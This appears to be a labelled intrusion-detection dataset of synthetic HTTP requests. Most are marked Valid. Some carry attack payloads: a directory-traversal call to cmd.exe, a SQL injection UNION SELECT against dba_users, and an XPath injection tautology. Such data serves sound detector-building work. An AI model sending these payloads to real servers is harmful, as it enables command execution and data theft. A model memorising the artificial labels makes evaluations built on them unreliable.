----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49050
Start - Id: 653
class: Valid
GET /Ir/dtmpG0TvwhereF9@nullihome/jawACDPk/zsHE41imh38aL0@@2UQ/cwwi/ttiiusu.mspx?eddl2iihnelaiab=ft&l1Nktnihm=62czAqWLvLN&ZCl.DCPGD4B=ce%3Ff&aiepd20nw=8042339&hCshs=r37fatmqcn&uNelhjCnai=elnet0irhb0o5ee&c9e4lttsyaw=sd+Ou&rERCv3vePLcrcp=oaiUf&enyemjnrlmr=ml%40v&eyii=wre&NZ92UitEY1Ha=rC-W8VxX&hvfTaRmgrCngou=e9echo%3B HTTP/1.0
Host: www.ulknrrlfe2.be:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate, compress, deflate
Accept-Language: 8jnxWdt-tndeAoaN;q=0.2
Cache-Control: min-fresh=37533
Client-ip: 98.101.91.241
Cookie: bCgrT8=pant\$fa;teO=88404362
Cookie2: $Version="55"
Date: Thu, 30 Jun 05 03:08:24 UTC
ETag: "_-06.3ZfGm2Re50KsW"
Expect: vfdVhi4r
From: i4suSHw@tttnzs.org
If-Modified-Since: Wed, 01 Jul 09 06:06:39 UTC
If-Unmodified-Since: Sat, 21 Nov 09 13:17:14 CET
If-Match: "lFpL8@Zp9PiJJ-CvYY"
If-None-Match: *
If-Range: "cSPpxDEBo@OXRVmg4UW"
Max-Forwards: 243
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: mtkpub oawuP=lorli
Range: -7,9185-99305,64-211014
Referer: /irefea/eamhh6/suwnt/l61du0yt.asmx
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: Accept
User-Agent: apTpbl48t (iieanCMs; tU4mGp08m; sZ49ke; iXbWDlkpk)
UA-CPU: x86
UA-Disp: 7551,458,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1676x432
Via: 5.9 94.6.246.155
Transfer-Encoding: compress
Upgrade: cIre/5.3
Warning: 822 www.doik.shtml:3 "omlq" "Sat, 28 Aug 04 02:17:50 UTC"
X-Forwarded-For: 170.17.150.153
X-Serial-Number: 541499677250739
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 653
Start - Id: 1943
class: Valid
GET /rtvREynoitaush0eh/nwQ0/nLXRSRkTlL6W7XLP3TJ/9h8eeEt.gif?oLIR4natnagnemr=hlnanilsUnpcs&ouBna3e=rauiwOt2eanhm&tsihuinb=autafrynEac&Q2-bP8sreplaceW=group+byaewnnrfwcopyadls0a&cmknnaauetsaoam=ugkNW6&vxgecoo=eservicesUea%26fs4%288bi%28&-GqfO5=0520832&ntaeludeoun=71760933 HTTP/1.1
Host: www.hwertx.uk
Connection: close
Accept: image/png;q=0.9, text/plain
Accept-Charset: windows-1255, iso-10646-ucs-2, koi8-r, windows-1254
Accept-Encoding: 
Accept-Language: 8s14s-gbkkIeuy;q=0.7, o6th-nesbO;q=0.2
Cache-Control: no-transform
Client-ip: 152.106.51.28
Cookie: db=)SilnnG
Cookie2: $Version="71"
Date: Wed, 04 May 05 05:14:20 GMT
ETag: W/"SLmMXLc63s.SN-b7H1Rf"
Expect: r6od=urssnn7;cduho=rrd5a9es
From: pvxch@7harUebet.com
If-Modified-Since: Mon, 24 Dec 07 09:08:17 GMT
If-Unmodified-Since: Sun, 04 Dec 05 14:55:09 GMT
If-Match: *
If-None-Match: "D9mASwvmqB3b2D9q81"
If-Range: Thu, 12 Feb 04 14:32:53 GMT
Max-Forwards: 2893
MIME-Version: 7.4
Pragma: tees='Eul'
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: 8erMn usNE=cpeNs1
Range: 0-,-750641
Referer: /tesce/ceeotb/tr267/tdt15md2/efRua.dll
TE: trailers
Trailer: Date
User-Agent: Mozilla/4.2 (Windows; U; Win98 3.4; 2q-hs; rv:5.5.1) Gecko/20147176
UA-CPU: Sparc
UA-Disp: 0367,7065,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1543x007
Via: ipu/8.9 www.zua55.js
Transfer-Encoding: identity
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 663 www.Libe.html "iztelp" "Wed, 09 May 07 24:02:00 UTC"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1943
Start - Id: 5138
class: Valid
POST /a70Q/ioo9teeanr.php4? HTTP/1.1
Content-Length: 143
Content-Language: aleis3sM,l
Content-Encoding: gzip
Content-Location: http://Bipe9eth.net/tmiree/2lGen/trdtt.zip
Content-MD5: dWJzRXRPZW81c3NhUWJvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 24 Apr 08 06:56:52 CET
Last-Modified: Fri, 02 Oct 09 20:24:52 GMT
Host: www.reeIaez6.uk
Connection: close
Accept: */*;q=0.6
Accept-Charset: utf-8;q=0.5, windows-1255
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 120.173.82.139
Cookie: leegtsaEtsdvowo=93tis/lsWninputsCyiorm;ctremMfuxowM2=238
Cookie2: $Version="190"
Date: Thu, 12 Nov 09 20:39:38 UTC
ETag: "8E82KKTK9E5YqyL"
Expect: 100-continue
From: daodwiso@rGHdclsrni.org
If-Modified-Since: Mon, 15 Aug 05 17:22:36 GMT
If-Unmodified-Since: Wed, 08 Feb 06 03:42:24 CET
If-Match: *
If-None-Match: "H4XanErrEbe2VsHELUh"
If-Range: *
Max-Forwards: 46
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: eNsit aneo7=ietstf
Authorization: Digest nc=11aaEEab
Range: -00275
Referer: /oa29iot/52nuTt1/8ltuOEe1/mt2io/tasl.cgi
TE: gzip;q=0.1
Trailer: Transfer-Encoding
User-Agent: r71S_Ro2 http://www.srepbv.biz
UA-CPU: MIPS
UA-Disp: 279,387,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6026x4919
Via: 9.6 www.sljd3.jpg, eeh/2.9 www.hea2.shtml:7457, FTP/5.5 www.edyvrtt.png:3720
Transfer-Encoding: compress
Upgrade: pnpc/1.3, oTfn/4.8
Warning: 224 227.126.233.183 "ehAds4enRxnay" 
X-Forwarded-For: 199.181.19.164
X-Serial-Number: 64870443961077
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

@B-htaccesL0drop=rKr7&gs= geb&l8YOdropSN6gmochasS=p@ettJDu4&uiver=392&othoielsmn=54&hehcoogditad=eNnmqWGX@rC&7BGhb=2680118&qzVwL=5645350292

End - Id: 5138
Start - Id: 12874
class: Valid
GET /yetj/ifViw/Ow/e0irep/pEo7g6lrLp9/aqW6/QrCmailvac/qL0xqWSrlTPgvuTxXJ.sh?1uT.IOyFd=Sa&CbPl77FscriptDT=fS7n&0nryedBHio=reoqWvon0tnUar&_keNCetmbPb=a+&i4yalFGx=%3Aes3moo&Amje=i_Hva15xSTv&estylewMGuXI3WOX=pZrc921_&fge=6&to=erDdi5i1htehi&ofFt7ehHeaiaR=74866281&ilrr=h9I8uP-&inh1aissl=hrmaci&mx=hntnE3lT&ae8eeevis=gu3wuteneddehszdWS&jsoa8qrheFre=tem HTTP/1.0
Host: 106.173.191.123
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987, iso-8859-8-i;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: aol-g, hid-A8ymtbtt;q=0.2, bocl-rjje
Cache-Control: no-cache
Client-ip: 66.27.83.26
Cookie: cvotye4e4re=nNtaa;weetil3etv0=05228196;f7g=4912737277
Cookie2: $Version="52"
Date: Tue, 18 Dec 07 08:43:45 GMT
ETag: "5_YVBPvb_8_iXA@up"
Expect: 100-continue
From: dt56@hx2gENt.it
If-Modified-Since: Tue, 14 Aug 07 17:47:58 CET
If-Unmodified-Since: Sun, 17 May 09 20:03:30 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Jan 06 15:45:02 UTC
Max-Forwards: 1231
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM bmZlY2dlYWVldG9vZXR0SGxob2VPaHRWZXN1YTVlNDl0ZWh1MXJzbWlud2Fy
Authorization: ntvxue 8pes=w9noN
Range: 35161-,-2,70941-
Referer: /sVtbma.tiff
TE: deflate;q=0.1,trailers
Trailer: Referer
User-Agent: 3uEnzyw
UA-CPU: StrongARM
UA-Disp: 8359,2395,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6070x3417
Via: FTP/2.9 www.umOnczii.png, 1.3 www.tuyiducr.html:018, bsasoT/1.1 137.224.76.15
Transfer-Encoding: gzip
Upgrade: nni/8.4
Warning: 657 108.119.89.134 "n3Eimiaj3lnutimDg" 
X-Forwarded-For: 91.199.65.166
X-Serial-Number: 4907746729509688
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12874
Start - Id: 44185
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.nEonlu.de
Connection: keep-alive
Accept: application/*, video/*, application/rtf;q=0.7
Accept-Charset: cp-932, big5, x-mac-turkish
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 163.193.116.46
Cookie: otmeete2si=tg2;hnr=88;XD20d=0865;eh8efaAynttouo=qpo1%s@en-;z1atsNvo=47345;JSmailOk=cr
Cookie2: $Version="1"
Date: Wed, 19 Oct 05 12:27:59 UTC
ETag: W/"M9dWmzaYsbHXIY4Lq7Am"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Wed, 29 Aug 07 24:56:10 UTC
If-Unmodified-Since: Wed, 07 Jan 04 03:20:55 GMT
If-Match: *
If-None-Match: ".kTQU1l@3gRY6mN"
If-Range: Thu, 30 Dec 04 04:25:15 GMT
Max-Forwards: 77
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: cDaurr ereutyh=ddc7ens
Range: 5-,-97,-5
Referer: /secdaA5s/aswyt5I/it3rjhre/wbelysi.php4
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/5.6 (compatible; hddeitAwe; Windows NT; hrloosenr; T6oOyd; taseychito)
UA-CPU: StrongARM
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: 9.4 35.174.121.35, tadhoe/8.3 82.252.108.104:8, 0.6 www.dbethx.tiff
Transfer-Encoding: deflate
Upgrade: llemvt/2.2, yAhrud/8.0, Cskdn/9.3
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44185
Start - Id: 9296
class: Valid
GET /ouEvcho1eCphArh/6a/WSechoClifscriptselectJCZ/dlotntb/aHw@bJnY/etAhC/Kf/aq95msCWw/ifU_vHJAaccess_log/rqDf/oYm.cfm? HTTP/1.0
Host: 77.184.36.62
Connection: keep-alive
Accept: video/mpeg, text/*, audio/basic
Accept-Charset: x-mac-turkish, x-mac-icelandic;q=0.6, shift_jis;q=0.1
Accept-Encoding: gzip;q=0.7, gzip;q=0.1, gzip;q=0.8, gzip;q=0.4
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 201.8.180.111
Cookie: yeyehm=sndL;ump=sro:;eok;ilepl=utmV6sn2
Cookie2: $Version="20"
Date: Wed, 10 Jan 07 21:23:43 CET
ETag: W/"RcS8qx1A-YjfM-RpU"
Expect: ejrw=feEent06;sLesp=hRhwpg
From: clbdsbE@ouRcuroAt.it
If-Modified-Since: Tue, 24 Feb 04 01:29:09 UTC
If-Unmodified-Since: Sun, 05 Aug 07 16:06:44 CET
If-Match: "OXfLq5ldsQ5h9E_"
If-None-Match: "CNVlA7QBoOefG.E"
If-Range: Mon, 15 Aug 05 24:23:50 GMT
Max-Forwards: 262
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: uwsis atswerih=iylimA
Range: 53-
Referer: http://aai1e8.be/erxbft.msf
TE: trailers,gzip,gzip;q=0.3
Trailer: If-Match
User-Agent: eg0uonfm1plrnv
UA-CPU: 68000
UA-Disp: 5472,2559,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6875x133
Via: FTP/7.7 224.28.165.35, HTTP/2.0 207.132.195.126
Transfer-Encoding: wgeati
Upgrade: ne3a/3.0, ktz/8.6, tsjraE/5.2, hlfe/6.2
Warning: 773 228.146.161.18 "eogoeOendth" "Tue, 23 Jan 07 17:19:26 CET"
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 9296
Start - Id: 5931
class: Valid
POST /HH.6TtelnettJGdmtx.bin? HTTP/1.0
Content-Length: 221
Content-Language: Dr,joauEi4a
Content-Encoding: gzip
Content-Location: /sdskren/moSnea/jiaad/lTucos.txt
Content-MD5: ZGw4ZmhUZXliaGJjaWNoaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Oct 09 12:37:30 GMT
Last-Modified: Mon, 23 May 05 11:18:10 UTC
Host: 208.6.241.95:8993
Connection: oazia
Accept: video/*;q=0.8, text/xml;q=0.7, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cge-MUmnttm, eng-dvs9t;q=0.4, rhI-htagdBue;q=0.3, arehseAo-e;q=0.3, rtpeqn-srehe2;q=0.6
Cache-Control: max-age=4438
Client-ip: 182.209.58.87
Cookie: 3mth=/rtacreh06ntaT3tteand;sePt=6536;yosEvoo=roh;erk=rtseDcrer
Cookie2: $Version="421"
Date: Thu, 10 Mar 05 15:33:56 UTC
ETag: W/"gNhmbmq4d4UV0ps1d5"
Expect: 100-continue
From: ytiErse@6nevoaelou.cz
If-Modified-Since: Wed, 15 Oct 08 05:11:06 GMT
If-Unmodified-Since: Sat, 25 Sep 04 02:40:59 GMT
If-Match: "q2gVKcmKziEd-Tldyw"
If-None-Match: "92oqILA6XWSF1TfZ-"
If-Range: Tue, 20 Nov 07 13:31:01 CET
Max-Forwards: 5
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="thtn"
Authorization: Digest algorithm=kht0N
Range: 1731-
Referer: /dMch/nntes/sned/johewth.msf
TE: chunked;q=0.7
Trailer: Range
User-Agent: rxf9sa/9.1.9
UA-CPU: 68000
UA-Disp: 0927,7062,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5099x0189
Via: rdx/9.5 www.Oyoni.gif, HTTP/4.5 www.5et5ohg8.jpeg
Transfer-Encoding: compress
Upgrade: diomed/1.4
Warning: 330 www.oi0dn.tiff "tmtnEiIsh8entLDrTl" "Tue, 16 Aug 05 14:24:45 GMT"
X-Forwarded-For: 81.125.98.15
X-Serial-Number: 235537183752
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

whyatXK=6mffqGotmytwioa&amiAo=46996&soa=gwarhAtmneeoaae2jz&eegobqeue=33969&kDXd-6V=2&m7Egroup byWSsock_streamUhLCb=scsfnrswnitelcXouZ&owehrthnlXost=ucpyiyhnodeb=&sosphyiartv4ko=60&bSneieermergr6A=9912560&wweo=ia7mo9nozr

End - Id: 5931
Start - Id: 13656
class: Valid
GET /oELRxhXU2i0MWP/uou_vX/formBBbexec8/rti1cu9/hOs9LvmeA/y_drG649pTw/oewrah0n4tlaovxFn/er8bOFEN95vTRs3m/VwOformtqidjtQ/t83t/3hoia8srthio/2iuassen.nsf?anLues0o94t=o%40oq&o67ox=tbaxe&rxneRRwiaesh=ws&e3si8ba=ueYtdiIetaox1hQ&an3lr64Iuct=bmlLeon%24+-+e%5Blocationhe+0&aehus=5141551&tahr=58734&oud3o2Nuiolmhdt=wu6v&satstatete=he+ou+%40smm HTTP/1.1
Host: 147.139.203.240:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, deflate
Accept-Language: es57e-hr0u;q=0.9, w0-osT, a-houeen, l9re-itgiwny;q=0.4
Cache-Control: no-cache
Client-ip: 129.37.132.67
Cookie: VdhV=6795522;RgG=g2h2iifxooot7u0ed;YSbJ=6005000239;oHi= et1<;hNwmeeLsr=qQj.MXEpKgP
Cookie2: $Version="7"
Date: Sat, 29 Sep 07 18:12:55 UTC
ETag: "mkzxxIB4zBdH_.L3@amL"
Expect: 100-continue
From: 2uses@EiiTw.cz
If-Modified-Since: Thu, 15 Sep 05 08:13:00 GMT
If-Unmodified-Since: Mon, 15 Dec 08 19:17:35 UTC
If-Match: "grJ9wrOd7WgqR3mKkl_"
If-None-Match: *
If-Range: Fri, 06 Apr 07 01:11:53 UTC
Max-Forwards: 2
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="eLtokse"
Authorization: NTLM aWFnbmV5bkloZWlocWUyZXNpaUpoMDZ1aWJlYXRsU2hlYw==
Range: 61-
Referer: /ereleu.cgi
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.1 (X11; U; Open BSD i386 0.9; ie-E0; rv:1.1.4) Gecko/71579885
UA-CPU: StrongARM
UA-Disp: 0718,4997,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 747x4906
Via: nkic8/8.5 www.eadETC0.html, 7.4 www.x0ieOyg.gif
Transfer-Encoding: identity
Upgrade: oiz/5.7, 4Whet/4.7, sdili/7.8
Warning: 810 233.40.240.2:75910 "hppilonufanrr5o" "Tue, 05 Oct 04 06:33:59 UTC"
X-Forwarded-For: 180.126.109.12
X-Serial-Number: 02500062912801761
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13656
Start - Id: 34369
class: Valid
PUT /7it2APhV4v_YQQtY/de3erM.exe? HTTP/1.0
Content-Length: 110
Content-Language: kh6mbi,jwEhioiE,tdsnn8
Content-Encoding: compress
Content-Location: http://www.1n1sinr7.be/eeRalgo/esnh/lmtmm3to/rnuEHs.php4
Content-MD5: dDhvcHJlZUxyQmRlZnRucA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Dec 09 23:29:15 UTC
Last-Modified: Sun, 31 Jan 10 17:10:33 CET
Host: www.ettdc.uk
Connection: dssqeajt
Accept: */*
Accept-Charset: euc-cn;q=0.3, x-mac-chinesesimp;q=0.4
Accept-Encoding: gzip;q=0.1, compress, identity, compress, compress
Accept-Language: ha-46lT;q=0.0, ansn-avsco;q=0.8
Cache-Control: max-age=0
Client-ip: 60.74.77.81
Cookie: i3=O$i
Cookie2: $Version="0"
Date: Thu, 14 Feb 08 18:45:03 UTC
ETag: "@KrgNNY8d52x4NiiC"
Expect: eaLgnyhm
From: tvvees@4vk8nsor.be
If-Modified-Since: Thu, 21 Jul 05 21:10:40 CET
If-Unmodified-Since: Thu, 20 Jan 05 22:40:53 UTC
If-Match: *
If-None-Match: "eMD1Knz_TBao4egW@k"
If-Range: "8IfARhoN7UdhrTsdMOH"
Max-Forwards: 4
MIME-Version: 9.1
Pragma: rcf=he
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: Basic bmt1bnNyMzpkcmh0RWli
Range: 4-
Referer: /k11e/iQse/emar/tonr.mspx
TE: trailers
Trailer: If-Modified-Since
User-Agent: aree (aMmWOI4pAC)
UA-CPU: x86
UA-Disp: 404,187,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 015x732
Via: 9.4 www.tno5mn.shtml, HTTP/1.4 95.223.223.141
Transfer-Encoding: identity
Upgrade: aa8el/9.2, rti/4.8, dpEae/4.2
Warning: 454 162.50.151.225 "tes99ltkugeiitg6tb" 
X-Forwarded-For: 107.108.232.99
X-Serial-Number: 71981796445551996576
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Djtn1Attt9tpmv= inputSf5&mdbtoui=i7le&uc7nhs1naP=hf~iipgh&c52hvnnaea=1poAnsr&rae2anet2g=08821&qsrjg=ehbaiwhn

End - Id: 34369
Start - Id: 8741
class: Valid
GET /slwkxRceinyhekiaAode/sz1pxq_w1LM/r.JYHe/vt8tyu3o1snovTidiaI/nTHAS/nccj0eeswLekwqoDeI4/u_7iv.htm?ht=sbxtn&JtnselectsRM4TH=G9stsrnuse&Xp2700Zxc_R=199830 HTTP/1.1
Host: 7.198.136.144
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-arabic, iso-8859-8;q=0.1, macintosh;q=0.9, x-mac-icelandic;q=0.4, koi8-r
Accept-Encoding: *
Accept-Language: 4zli-ieo6pi;q=0.6, sh3r-aou, f-dceo2h;q=0.5
Cache-Control: only-if-cached
Client-ip: 51.229.66.148
Cookie: i4pnteiixTmhko=eihtw;naEgjbtr=jcap;Eeteenaaeser5as=5ut;Kboot.iniPT=570;itda7=pTgei
Cookie2: $Version="37"
Date: Tue, 09 May 06 24:59:59 CET
ETag: W/"kG3l@WYtqYm_e8XVz2S"
Expect: 100-continue
From: gtRthpn@euhjO9.it
If-Modified-Since: Sun, 07 Mar 10 08:59:15 GMT
If-Unmodified-Since: Mon, 28 Jul 08 03:18:31 UTC
If-Match: *
If-None-Match: "O-2CguMI@WwHu6Aw"
If-Range: Mon, 13 Jul 09 02:23:36 GMT
Max-Forwards: 44
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: twi2ig maenlana=he6iSwdI
Authorization: Digest nc=E82Bd8a6
Range: 291-,7962-175
Referer: /flnelltB/mciolb/fenc/hcevtead.mdb
TE: deflate;q=0.0,trailers,trailers
Trailer: If-Match
User-Agent: iM1KuW http://www.ututi.biz
UA-CPU: PowerPC
UA-Disp: 036,8992,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 323x9926
Via: fNia/2.7 49.102.206.169, 8.0 www.hcuea.jpg
Transfer-Encoding: deflate
Upgrade: nr2n/6.6, c8dm/9.0, eih/0.8, mee/9.2
Warning: 196 69.31.102.112 "meOretmuAnoa24aNg" "Sun, 13 Nov 05 21:30:28 UTC"
X-Forwarded-For: 85.79.219.185
X-Serial-Number: 14852095010495286519
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8741
Start - Id: 2843
class: Valid
GET /HAAVh/xeawaeaoodiat/HScEcWaq/xlVzA/oh/aRgfth/p56fDiDzd/6eer/ieo8/FG9chavingMN/stanrqe7esui3aleede.gif?eore=pH.%40&_pdq=8971622783&w.f84=senccuBenaeb&yrU.4o086connect=nikr%245+nimgaewp-disilsamno&NldInz=h&SttrihtmP=mB0&obtsUsaeaumofso=ste+e&5eisaaryo5kx=nN%4056N HTTP/1.1
Host: www.jihi.st
Connection: close
Accept: image/jpeg;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: E='uhyb0l'
Client-ip: 213.24.201.197
Cookie: kso4enocst5h=e5errmkhunionEt;tktdrtmemE0='w)e;mEui0Gg3=nformA;at=26;l0noeiseorgb=oz;otItpd=knxoIDaselsa6TA
Cookie2: $Version="975"
Date: Tue, 18 May 04 04:22:43 GMT
ETag: W/"re3IT0H5@LmmROzojym"
Expect: oeiuyeaf=fe0e2;e8rcdolt=pntyer
From: eu9oe@edkE.uk
If-Modified-Since: Sun, 23 Aug 09 02:21:40 GMT
If-Unmodified-Since: Mon, 11 Sep 06 06:19:06 CET
If-Match: *
If-None-Match: "gWlKTGW9ZfrbNZVBw"
If-Range: Thu, 07 Aug 08 07:01:31 GMT
Max-Forwards: 200
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic bmFtYWg6NXMyYXY=
Authorization: Basic dHlzZGJ3OmRlaG5O
Range: -19
Referer: /icatg/ank1sea/aeene/g2mrim.msf
TE: trailers
Trailer: TE
User-Agent: e5argo/8.5.0
UA-CPU: Sparc
UA-Disp: 8739,408,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7338x2329
Via: HTTP/9.4 www.2ttw.gif:4497, FTP/6.4 45.2.94.224, 9.6 108.241.139.198
Transfer-Encoding: hwhr; zmkhaw=eNtdl3h
Upgrade: dp5e/7.1, 6Wocs/8.4, sytonn/2.0, a4edeH/0.9
Warning: 986 www.oexicut.css "oret" "Sun, 29 Aug 04 08:26:28 GMT"
X-Forwarded-For: 205.119.197.218
X-Serial-Number: 674535146316
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2843
Start - Id: 41672
class: SqlInjection
GET /fg.n6SwyQ3Ap.php?sthiEa=Kmteh&nWqfromZ791Zy=rSi&a6owiAm=n9f&dd9eo7u=d5h%27+++++UNION++++%2F**%2F+++SELECT+wEu+++++FROM+++dba_users++WHERE++essel+++++like++++%27%2525&kctd9hIduesC=lnqrVr2hocogsakihd&8Bidupdate=tenbud++%3CltRe&e0eoorm=618721&AtnEhmruaesi=n%40nEr&r8HOnulllib-K8sZ=uewtiwnee%7C&Xlog@c3Dks=37313077&OaRRIWJYp=alinzxwph&-MY0es=610708 HTTP/1.1
Host: 193.49.131.168
Connection: LiinT
Accept: application/*;q=0.1, application/*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: aToa-ewp, 3Esf-ihd, knnl-dh5;q=0.9
Cache-Control: max-stale
Client-ip: 152.95.8.177
Cookie: lhkssurnnCrx=s3e%;aiynm=Lnab~ein%4o; cnrobjectdndt;aSfymtBgnMag=ldcnt0wget~>;srg]mte-c
Cookie2: $Version="5"
Date: Sun, 08 Jul 07 02:22:14 CET
ETag: "9etS4jTU1lIUOtjyf_"
Expect: 7huauig
From: maohii@yrratfrp.uk
If-Modified-Since: Wed, 03 Mar 04 08:05:41 UTC
If-Unmodified-Since: Sun, 27 Jun 04 17:08:53 GMT
If-Match: *
If-None-Match: "iq7M18atiEy_-Mx"
If-Range: "_KIJEaf8OC-xMi3Ne"
Max-Forwards: 5385
MIME-Version: 1.5
Pragma: rlitR9S=noasnay
Proxy-Authorization: ne1cn l3hIf=adoal
Authorization: Basic bnhpRWM6bnNhcnNzbA==
Range: -91,787-299778
Referer: /ettmia/irosIsl.tiff
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.8 (compatible; 7RgRe9itse; Win 9x; 5ss5ad5; ycmcdfl7r)
UA-CPU: MIPS
UA-Disp: 2834,2406,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/1.7 35.198.25.46, FTP/4.6 www.pdicdn.html:9
Transfer-Encoding: identity
Upgrade: Exe2/5.7, all/8.8, cei1I/8.8, syzked/1.5
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 46.66.131.26
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41672
Start - Id: 49593
class: XPathInjection
GET /e5Ff-ICtX4V9ZHAL@-/m8ralnf5sactiIxfsie/QgAjqnsk4nZ_/nuoWk/rse2Cxemee5rld/soiiOnut6icbuhoatkea/aGs6tdteivy3ap/p5uzt/gfsNk-Qen-TSUH3BcpAt/v-3A_@22ygQ.shtml?nspeeheesiot=nbni%27++++or+++6+%3C+count%28path%2Fchild%3A%3A*%29+++++or+++++%274g%27++++%3D++%27&sur9euZnbPte=t%28l&osbuiEvrfy=1c6ij8e&a7x0cd=aEJs7cRiD&8wtmpWVA8dNz8=Ya9eNSbmeta HTTP/1.1
Host: www.d9gttEgd.uk
Connection: close
Accept: text/plain;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 132.114.34.1
Cookie: cD=union;aWSJem=177
Cookie2: $Version="81"
Date: Mon, 05 Sep 05 03:07:49 UTC
ETag: "45E@hf2nml@00lw"
Expect: 100-continue
From: rmya@typuTon9h.uk
If-Modified-Since: Wed, 14 Oct 09 22:41:20 UTC
If-Unmodified-Since: Fri, 03 Feb 06 01:01:40 UTC
If-Match: "yuUsyu_rHXkxVVf12F"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: NTLM aW9jQWVhZWh1cXRFZTYyd3JyZG9oZnRhbWVzT2xoN2ZUUWV3
Range: 124-314534,89-
Referer: http://www.iahdwzWv.gov/1tz5s/ttrte.gif
TE: deflate;q=0.8,chunked;q=0.4
Trailer: If-Range
User-Agent: Mozilla/8.9 (Windows; U; WinNT 9.6; Cg-rm; rv:0.4.0) Gecko/38073376
UA-CPU: StrongARM
UA-Disp: 427,3177,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 122x540
Via: 4.2 www.ovleaorU.htm:327, HTTP/6.3 www.Yz9t.shtml
Transfer-Encoding: identity
Upgrade: iasi6m/1.5, ep9/4.9, ip9nui/4.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
